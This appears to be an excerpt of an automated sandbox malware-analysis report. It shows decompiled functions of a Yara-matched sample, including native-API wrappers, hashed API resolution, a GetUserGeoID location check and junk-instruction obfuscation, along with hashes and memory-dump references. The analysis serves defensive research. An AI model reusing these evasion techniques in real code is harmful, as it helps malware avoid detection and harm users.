				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                          0x0041e602
                                          0x0041e60a
                                          0x0041e640
                                          0x0041e644

                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000000,?,0041935F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041935F,?,00000000,00000060,00000000,00000000), ref: 0041E640
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_dlcmto.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: ff6043353ceb920c5c6b95fa545531b6d027e3119837083dac9160f643623646
                                          • Instruction ID: 896d7442baf9be4756d905739e1f90aa296932759f722aab2a73c44ca3a6dc04
                                          • Opcode Fuzzy Hash: ff6043353ceb920c5c6b95fa545531b6d027e3119837083dac9160f643623646
                                          • Instruction Fuzzy Hash: D3F0BDB2204208ABCB08CF89DC85EEB37ADAF8C754F018248BA0997241C630E8518BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E6A3 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 223 41e6a3-41e6ec call 41f243 NtReadFile
                                          C-Code - Quality: 37%
                                          			E0041E6A3(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t3 = _a4 + 0xa74; // 0xa76
				_t27 = _t3;
				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}





                                          0x0041e6b2
                                          0x0041e6b2
                                          0x0041e6ba
                                          0x0041e6e8
                                          0x0041e6ec

                                          APIs
                                          • NtReadFile.NTDLL(00419523,004149F3,FFFFFFFF,0041900D,00000002,?,00419523,00000002,0041900D,FFFFFFFF,004149F3,00419523,00000002,00000000), ref: 0041E6E8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_dlcmto.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 2d12266bc7a0f10b7c649805d53fb3a44196c039d978ed09e5374c20c4afdbd2
                                          • Instruction ID: a52c969a109bbc10a8a1a781a5aa37a0394cb6bb67041f9c77339075023d92d4
                                          • Opcode Fuzzy Hash: 2d12266bc7a0f10b7c649805d53fb3a44196c039d978ed09e5374c20c4afdbd2
                                          • Instruction Fuzzy Hash: 4EF0FFB2200208ABCB04DF89DC84EEB77ADAF8C714F018248BA0DA7241C630E8118BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E7D3 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 226 41e7d3-41e7e9 227 41e7ef-41e810 NtAllocateVirtualMemory 226->227 228 41e7ea call 41f243 226->228 228->227
                                          C-Code - Quality: 100%
                                          			E0041E7D3(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _a4, _t10 + 0xa8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                          0x0041e7ea
                                          0x0041e80c
                                          0x0041e810

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E80C
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_dlcmto.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: c6dcf1b2085be2652a56e81aa7d61fbadce5d8b21ef35205e1b29a90b99b07af
                                          • Instruction ID: 27bf8a3fb07fce7131f8418fc0fb77bd2b10fdbd594230fdd84e61d9d7c2cc87
                                          • Opcode Fuzzy Hash: c6dcf1b2085be2652a56e81aa7d61fbadce5d8b21ef35205e1b29a90b99b07af
                                          • Instruction Fuzzy Hash: BBF01EB6200208ABCB18DF89DC81EEB77ADAF88754F018159BE0897241C630F911CBB4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E723 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041E723(intOrPtr _a4, void* _a8) {
				long _t8;

				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                          0x0041e73a
                                          0x0041e748
                                          0x0041e74c

                                          APIs
                                          • NtClose.NTDLL(00410328,00000000,?,00410328,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E748
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_dlcmto.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 830b885a3245526015f54344d79e5b01ded446f9b8a9012b98a688606644bbf8
                                          • Instruction ID: 9c4ed7dd7ad381e5692115c9670513ce9f617838e6ca6e8741f9ee3af2ac2269
                                          • Opcode Fuzzy Hash: 830b885a3245526015f54344d79e5b01ded446f9b8a9012b98a688606644bbf8
                                          • Instruction Fuzzy Hash: 3CD01776604214ABD610EBA9DC89FD77BACDF48664F0184A9BA1C5B242C571FA0086E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E943 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 3 41e943-41e96f call 41f243 ExitProcess
                                          C-Code - Quality: 100%
                                          			E0041E943(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E0041F243( *((intOrPtr*)(_a4 + 0x164)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x164)), 0, 0x36);
				ExitProcess(_a8);
			}



                                          0x0041e946
                                          0x0041e95d
                                          0x0041e96b

                                          APIs
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E96B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_dlcmto.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: w5@
                                          • API String ID: 621844428-2048009441
                                          • Opcode ID: ddff7cea5deb504553f35d9d56e2b182a7c93aee5d24c6ec521c17bd09e3aeca
                                          • Instruction ID: 28662ead1a8a2610f8e7ad364a80deeb4b3648c83f3036173ff49b3b7ba48b6c
                                          • Opcode Fuzzy Hash: ddff7cea5deb504553f35d9d56e2b182a7c93aee5d24c6ec521c17bd09e3aeca
                                          • Instruction Fuzzy Hash: CAD01776A003147BCA20EB99CC85FD777ACDF457A4F0180A5BA4C5B282C675BA00C7E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E935 Relevance: 3.0, APIs: 2, Instructions: 36memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 21%
                                          			E0041E935() {

				asm("daa");
				asm("int 0xa2");
				asm("loope 0xffffff9e");
				asm("stc");
				_push(0x9f547df3);
				_t7 =  *0xFFFFFFFF8BEC8B5D;
				E0041F243( *((intOrPtr*)( *0xFFFFFFFF8BEC8B5D + 0x164)), _t7, _t7 + 0xaa8,  *((intOrPtr*)( *0xFFFFFFFF8BEC8B5D + 0x164)), 0, 0x36);
				ExitProcess( *0xFFFFFFFF8BEC8B61);
			}



                                          0x0041e935
                                          0x0041e938
                                          0x0041e93a
                                          0x0041e93c
                                          0x0041e93d
                                          0x0041e946
                                          0x0041e95d
                                          0x0041e96b

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00418CB9,?,00419460,00419460,?,00418CB9,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E8F0
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E96B
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_dlcmto.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateExitHeapProcess
                                          • String ID:
                                          • API String ID: 1054155344-0
                                          • Opcode ID: d9de683a8bfab9e82bb086d4083715190b7a9b1252d4d09981e748e756a53aaf
                                          • Instruction ID: cf9cc797f96d59935dff7869ae2ce17e4b40744dbe2bb0b75c86a5cc178cc62b
                                          • Opcode Fuzzy Hash: d9de683a8bfab9e82bb086d4083715190b7a9b1252d4d09981e748e756a53aaf
                                          • Instruction Fuzzy Hash: 5EF024B8A041006BC710DBA4CC85ED33BA8EF85204F144499BC980B202C179E91583F1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004098A3 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 84%
                                          			E004098A3(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t13;
				int _t15;
				long _t25;
				int _t27;
				void* _t28;
				void* _t32;

				_t32 = __eflags;
				_v68 = 0;
				E00420213( &_v67, 0, 0x3f);
				E00420CC3( &_v68, 3);
				_t19 = _a4;
				_t13 = E0040CF23(_t32, _a4 + 0x20,  &_v68); // executed
				_t15 = E00419603(_a4 + 0x20, _t13, 0, 0, E00402E13(0x2ef2527b));
				_t27 = _t15;
				if(_t27 != 0) {
					_t25 = _a8;
					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						return  *_t27(_t25, 0x8003, _t28 + (E0040C5F3(1, 8, _t19 + 0x540) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}











                                          0x004098a3
                                          0x004098b4
                                          0x004098b8
                                          0x004098c3
                                          0x004098c8
                                          0x004098d3
                                          0x004098eb
                                          0x004098f0
                                          0x004098f7
                                          0x004098f9
                                          0x00409906
                                          0x0040990a
                                          0x00000000
                                          0x0040992e
                                          0x0040990a
                                          0x00409936

                                          APIs
                                          • PostThreadMessageW.USER32(000072B1,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409906
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_dlcmto.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 8c8e9f467bb6879c5a8c78f1d0dc2f5625c34b38545da03a8c9cbc3b65211247
                                          • Instruction ID: 8f2db9fe8dd4293e769d4f79dd02f83159bb7ad0b88680d8187a7f3a5710d2c7
                                          • Opcode Fuzzy Hash: 8c8e9f467bb6879c5a8c78f1d0dc2f5625c34b38545da03a8c9cbc3b65211247
                                          • Instruction Fuzzy Hash: 6C019B71A4022876E720A695DC82FEF775C9B45B54F14012DFB047A2C2D6A8AD0647F9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E8F5 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 229 41e8f5-41e901 230 41e930-41e934 RtlFreeHeap 229->230 231 41e903-41e91a call 41f243 229->231 233 41e91f-41e92f 231->233 233->230
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,07110A7A,00000000,?), ref: 0041E930
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_dlcmto.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 55a0592ddd3e87e94e10c422cadf91ba0204797f2d40f8ce93b3a82e1634df7f
                                          • Instruction ID: 1f4064dec4080926383eea4deb29f94a4842a973331a5e3ad2f339e89f1cfb14
                                          • Opcode Fuzzy Hash: 55a0592ddd3e87e94e10c422cadf91ba0204797f2d40f8ce93b3a82e1634df7f
                                          • Instruction Fuzzy Hash: A9F085B5210208ABCB18EF89CC48EA777A8EF88310F004959F90967252C634FA05CAA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E8C3 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 239 41e8c3-41e8f4 call 41f243 RtlAllocateHeap
                                          C-Code - Quality: 100%
                                          			E0041E8C3(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				_t3 = _a4 + 0xa9c; // 0xa9c
				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                          0x0041e8d2
                                          0x0041e8da
                                          0x0041e8f0
                                          0x0041e8f4

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00418CB9,?,00419460,00419460,?,00418CB9,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E8F0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_dlcmto.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: f17a861d9ed32d2812970187304d035b903240b31c6816d5bb72975ed103bc71
                                          • Instruction ID: 54a437fc11085ca12ae2a9f31c46b1b25ee2b1612e845e8a2c08afeac8ca904d
                                          • Opcode Fuzzy Hash: f17a861d9ed32d2812970187304d035b903240b31c6816d5bb72975ed103bc71
                                          • Instruction Fuzzy Hash: 67E046B6600208ABCB14EF89DC45EE737ACEF88764F018059FE085B242C670F914CAF1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004100A3 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 234 4100a3-4100bc 235 4100c2-4100c7 234->235 236 4100bd call 419603 234->236 237 4100c9-4100ca 235->237 238 4100cb-4100dc GetUserGeoID 235->238 236->235
                                          C-Code - Quality: 37%
                                          			E004100A3(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				_t7 = E00419603(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}





                                          0x004100bd
                                          0x004100c7
                                          0x004100cd
                                          0x004100dc
                                          0x004100ca
                                          0x004100ca
                                          0x004100ca

                                          APIs
                                          • GetUserGeoID.KERNELBASE(00000010), ref: 004100CD
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_dlcmto.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: User
                                          • String ID:
                                          • API String ID: 765557111-0
                                          • Opcode ID: 5c78032def2810ca0ad8a16165e38517362f870899e299bda81b49b85eaa7669
                                          • Instruction ID: c28064bcec0e87ed17199b1c401a6025e046bcfeae29810ee43e910d84b218be
                                          • Opcode Fuzzy Hash: 5c78032def2810ca0ad8a16165e38517362f870899e299bda81b49b85eaa7669
                                          • Instruction Fuzzy Hash: AAE0C27368030426F72091A59C86FA6364E5B84B00F088475F90CD72C2D598E8C01024
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E903 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,07110A7A,00000000,?), ref: 0041E930
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_dlcmto.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 7697639fdb2ed1d6984d37921a483162611dfaf69af01616cded54fe58bb6f02
                                          • Instruction ID: 7d567fb0b9b374d2fcadea76b5f186a9fefaaa7f04dd58c50085a667477643af
                                          • Opcode Fuzzy Hash: 7697639fdb2ed1d6984d37921a483162611dfaf69af01616cded54fe58bb6f02
                                          • Instruction Fuzzy Hash: E8E012B5600208ABCB14EF89DC49EA737ACAF88754F018059BA095B282C670E914CAB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041EA63 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041EA63(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041F243( *((intOrPtr*)(_a4 + 0x2f8)), _a4, _t7 + 0xab8,  *((intOrPtr*)(_a4 + 0x2f8)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                          0x0041ea7d
                                          0x0041ea93
                                          0x0041ea97

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FEF5,0040FEF5,?,00000000,?,?), ref: 0041EA93
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_dlcmto.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: b9bac6194bc143243254909c43a71d5c07130939405321bbf8bc0adf5f3a6230
                                          • Instruction ID: 441ee85fda3589afd26e41ae61f19a3667434cbc207aca3ddcc64c5dc7615bd2
                                          • Opcode Fuzzy Hash: b9bac6194bc143243254909c43a71d5c07130939405321bbf8bc0adf5f3a6230
                                          • Instruction Fuzzy Hash: 13E01AB56002046BC710DF89CC45EE777ADAF88654F014165BA0857242C675E9548AB5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 01197D84 Relevance: 9.2, APIs: 6, Instructions: 193COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E01197D84(void* __esi, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12) {
				signed int _v8;
				struct _WIN32_FIND_DATAW _v600;
				char _v601;
				intOrPtr* _v608;
				union _FINDEX_INFO_LEVELS _v612;
				union _FINDEX_INFO_LEVELS _v616;
				union _FINDEX_INFO_LEVELS _v620;
				signed int _v624;
				union _FINDEX_INFO_LEVELS _v628;
				union _FINDEX_INFO_LEVELS _v632;
				signed int _v636;
				signed int _v640;
				union _FINDEX_INFO_LEVELS _v644;
				union _FINDEX_INFO_LEVELS _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				signed int _v660;
				union _FINDEX_INFO_LEVELS _v664;
				union _FINDEX_INFO_LEVELS _v668;
				void* __ebx;
				void* __edi;
				signed int _t53;
				char _t55;
				signed char _t56;
				signed int _t62;
				signed int _t72;
				signed int _t75;
				union _FINDEX_INFO_LEVELS _t76;
				union _FINDEX_INFO_LEVELS _t78;
				intOrPtr* _t84;
				signed int _t87;
				intOrPtr _t94;
				union _FINDEX_INFO_LEVELS _t96;
				intOrPtr* _t97;
				signed int _t102;
				signed int _t108;
				intOrPtr _t112;
				void* _t113;
				void* _t114;
				signed int _t115;
				void* _t116;
				void* _t117;

				_t113 = __esi;
				_t53 =  *0x11a7210; // 0xbb40e64e
				_v8 = _t53 ^ _t115;
				_t97 = _a8;
				_t111 = _a12;
				_t112 = _a4;
				_v608 = _t111;
				if(_t97 == _t112) {
					L6:
					_t55 =  *_t97;
					_v601 = _t55;
					if(_t55 != 0x3a) {
						L10:
						_t96 = 0;
						__eflags = _t55 - 0x2f;
						if(__eflags == 0) {
							L13:
							_t56 = 1;
							L14:
							_v668 = _t96;
							_v664 = _t96;
							_push(_t113);
							asm("sbb eax, eax");
							_v660 = _t96;
							_v656 = _t96;
							_v636 =  ~(_t56 & 0x000000ff) & _t97 - _t112 + 0x00000001;
							_v652 = _t96;
							_v648 = _t96;
							_t62 = E01197883(_t97 - _t112 + 1, _t112,  &_v668, E011977EB(_t111, __eflags));
							_t117 = _t116 + 0xc;
							asm("sbb eax, eax");
							_t114 = FindFirstFileExW( !( ~_t62) & _v660, _t96,  &_v600, _t96, _t96, _t96);
							__eflags = _t114 - 0xffffffff;
							if(_t114 != 0xffffffff) {
								_t102 =  *((intOrPtr*)(_v608 + 4)) -  *_v608;
								__eflags = _t102;
								_t103 = _t102 >> 2;
								_v640 = _t102 >> 2;
								do {
									_v632 = _t96;
									_v628 = _t96;
									_v624 = _t96;
									_v620 = _t96;
									_v616 = _t96;
									_v612 = _t96;
									_t72 = E01197B7D( &(_v600.cFileName),  &_v632,  &_v601, E011977EB(_t111, __eflags));
									_t117 = _t117 + 0x10;
									asm("sbb eax, eax");
									_t75 =  !( ~_t72) & _v624;
									__eflags =  *_t75 - 0x2e;
									if( *_t75 != 0x2e) {
										L21:
										_push(_v608);
										_t76 = E01197CD3(_t103, _t114, _t75, _t112, _v636);
										_t117 = _t117 + 0x10;
										_v644 = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											__eflags = _v612 - _t96;
											if(_v612 != _t96) {
												E011963FE(_v624);
												_t76 = _v644;
											}
											_t96 = _t76;
											L30:
											FindClose(_t114);
											L31:
											__eflags = _v648;
											_pop(_t113);
											if(_v648 != 0) {
												E011963FE(_v660);
											}
											_t78 = _t96;
											L34:
											return E01191F25(_t78, _t96, _v8 ^ _t115, _t111, _t112, _t113);
										}
										goto L22;
									}
									_t103 =  *((intOrPtr*)(_t75 + 1));
									__eflags = _t103;
									if(_t103 == 0) {
										goto L22;
									}
									__eflags = _t103 - 0x2e;
									if(_t103 != 0x2e) {
										goto L21;
									}
									__eflags =  *((intOrPtr*)(_t75 + 2)) - _t96;
									if( *((intOrPtr*)(_t75 + 2)) == _t96) {
										goto L22;
									}
									goto L21;
									L22:
									__eflags = _v612 - _t96;
									if(_v612 != _t96) {
										E011963FE(_v624);
										_pop(_t103);
									}
									__eflags = FindNextFileW(_t114,  &_v600);
								} while (__eflags != 0);
								_t84 = _v608;
								_t108 = _v640;
								_t111 =  *_t84;
								_t87 =  *((intOrPtr*)(_t84 + 4)) -  *_t84 >> 2;
								__eflags = _t108 - _t87;
								if(_t108 != _t87) {
									E0119B630(_t111, _t111 + _t108 * 4, _t87 - _t108, 4, E01197FDB);
								}
								goto L30;
							}
							_push(_v608);
							_t96 = E01197CD3( &_v600, _t114, _t112, _t96, _t96);
							goto L31;
						}
						__eflags = _t55 - 0x5c;
						if(__eflags == 0) {
							goto L13;
						}
						__eflags = _t55 - 0x3a;
						_t56 = 0;
						if(__eflags != 0) {
							goto L14;
						}
						goto L13;
					}
					if(_t97 == _t112 + 1) {
						_t55 = _v601;
						goto L10;
					}
					_push(_t111);
					_t96 = 0;
					_t78 = E01197CD3(_t97, _t113, _t112, 0, 0);
					goto L34;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t94 =  *_t97;
					if(_t94 == 0x2f || _t94 == 0x5c || _t94 == 0x3a) {
						break;
					}
					_t97 = E0119BBC0(_t112, _t97);
					if(_t97 != _t112) {
						continue;
					}
					break;
				}
				_t111 = _v608;
				goto L6;
			}













































                                          0x01197d84
                                          0x01197d8f
                                          0x01197d96
                                          0x01197d99
                                          0x01197d9c
                                          0x01197da1
                                          0x01197da4
                                          0x01197dac
                                          0x01197dd1
                                          0x01197dd1
                                          0x01197dd3
                                          0x01197ddb
                                          0x01197dfd
                                          0x01197dfd
                                          0x01197dff
                                          0x01197e01
                                          0x01197e0d
                                          0x01197e0d
                                          0x01197e0f
                                          0x01197e15
                                          0x01197e1d
                                          0x01197e23
                                          0x01197e24
                                          0x01197e26
                                          0x01197e2e
                                          0x01197e34
                                          0x01197e3a
                                          0x01197e40
                                          0x01197e54
                                          0x01197e59
                                          0x01197e64
                                          0x01197e7a
                                          0x01197e7c
                                          0x01197e7f
                                          0x01197ea2
                                          0x01197ea2
                                          0x01197ea4
                                          0x01197ea7
                                          0x01197ead
                                          0x01197ead
                                          0x01197eb3
                                          0x01197eb9
                                          0x01197ebf
                                          0x01197ec5
                                          0x01197ecb
                                          0x01197eec
                                          0x01197ef1
                                          0x01197ef6
                                          0x01197efa
                                          0x01197f00
                                          0x01197f03
                                          0x01197f16
                                          0x01197f16
                                          0x01197f24
                                          0x01197f29
                                          0x01197f2c
                                          0x01197f32
                                          0x01197f34
                                          0x01197f92
                                          0x01197f98
                                          0x01197fa0
                                          0x01197fa5
                                          0x01197fab
                                          0x01197fac
                                          0x01197fae
                                          0x01197faf
                                          0x01197fb5
                                          0x01197fb5
                                          0x01197fbc
                                          0x01197fbd
                                          0x01197fc5
                                          0x01197fca
                                          0x01197fcb
                                          0x01197fcd
                                          0x01197fda
                                          0x01197fda
                                          0x00000000
                                          0x01197f34
                                          0x01197f05
                                          0x01197f08
                                          0x01197f0a
                                          0x00000000
                                          0x00000000
                                          0x01197f0c
                                          0x01197f0f
                                          0x00000000
                                          0x00000000
                                          0x01197f11
                                          0x01197f14
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01197f36
                                          0x01197f36
                                          0x01197f3c
                                          0x01197f44
                                          0x01197f49
                                          0x01197f49
                                          0x01197f58
                                          0x01197f58
                                          0x01197f60
                                          0x01197f66
                                          0x01197f6c
                                          0x01197f73
                                          0x01197f76
                                          0x01197f78
                                          0x01197f88
                                          0x01197f8d
                                          0x00000000
                                          0x01197f78
                                          0x01197e81
                                          0x01197e92
                                          0x00000000
                                          0x01197e92
                                          0x01197e03
                                          0x01197e05
                                          0x00000000
                                          0x00000000
                                          0x01197e07
                                          0x01197e09
                                          0x01197e0b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01197e0b
                                          0x01197de2
                                          0x01197df7
                                          0x00000000
                                          0x01197df7
                                          0x01197de4
                                          0x01197de5
                                          0x01197dea
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01197dae
                                          0x01197dae
                                          0x01197dae
                                          0x01197db2
                                          0x00000000
                                          0x00000000
                                          0x01197dc5
                                          0x01197dc9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01197dc9
                                          0x01197dcb
                                          0x00000000

                                          APIs
                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 01197E74
                                          • _free.LIBCMT ref: 01197FC5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
